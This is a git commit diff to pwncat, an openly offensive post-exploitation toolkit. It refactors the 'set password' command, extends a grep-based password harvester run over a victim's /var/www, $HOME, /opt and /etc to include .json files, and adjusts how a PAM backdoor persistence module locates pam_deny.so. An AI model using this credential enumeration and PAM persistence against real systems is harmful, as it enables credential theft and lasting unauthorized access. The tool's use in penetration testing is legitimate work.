Fixed password config and enumeration

2024-11-27 19:04:15 +01:00 · 2020-06-04 03:34:21 -04:00 · 2020-06-04 03:34:21 -04:00 · 528088be77
commit 528088be77
parent d3ac61c0f8
3 changed files with 9 additions and 7 deletions
--- a/pwncat/commands/set.py
+++ b/pwncat/commands/set.py
@ -36,10 +36,10 @@ class Command(CommandDefinition):
        if args.password:
            if args.variable is None:
                found = False
-                for user, props in pwncat.victim.users.items():
-                    if "password" in props and props["password"] is not None:
+                for name, user in pwncat.victim.users.items():
+                    if user.password is not None:
                        print(
-                            f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(props['password'])}{Fore.RESET}"
+                            f" - {Fore.GREEN}{user}{Fore.RESET} -> {Fore.RED}{repr(user.password)}{Fore.RESET}"
                        )
                        found = True
                if not found:
@ -50,7 +50,7 @@ class Command(CommandDefinition):
                print(
                    f" - {Fore.GREEN}{args.variable}{Fore.RESET} -> {Fore.RED}{repr(args.value)}{Fore.RESET}"
                )
-                pwncat.victim.users[args.variable]["password"] = args.value
+                pwncat.victim.users[args.variable].password = args.value
        else:
            if (
                args.variable is not None
--- a/pwncat/enumerate/passwords.py
+++ b/pwncat/enumerate/passwords.py
@ -52,13 +52,13 @@ def enumerate() -> Generator[FactData, None, None]:
    locations = ["/var/www", "$HOME", "/opt", "/etc"]
    # The types of files which are "code". This means that we only recognize the
    # actual password if it is a literal value (enclosed in single or double quotes)
-    code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini"]
+    code_types = [".c", ".php", ".py", ".sh", ".pl", ".js", ".ini", ".json"]
    grep = pwncat.victim.which("grep")

    if grep is None:
        return

-    command = f"{grep} -InRiE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
+    command = f"{grep} -InriE 'password[\"'\"'\"']?\\s*(=>|=|:)' {' '.join(locations)} 2>/dev/null"
    with pwncat.victim.subprocess(command, "r") as filp:
        for line in filp:
            line = line.decode("utf-8").strip().split(":")
--- a/pwncat/persist/pam.py
+++ b/pwncat/persist/pam.py
@ -114,7 +114,9 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
            pam_modules = "/usr/lib/security"
            try:
                results = (
-                    pwncat.victim.env(["find", "/", "-name", "pam_deny.so"])
+                    pwncat.victim.run(
+                        "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
+                    )
                    .strip()
                    .decode("utf-8")
                )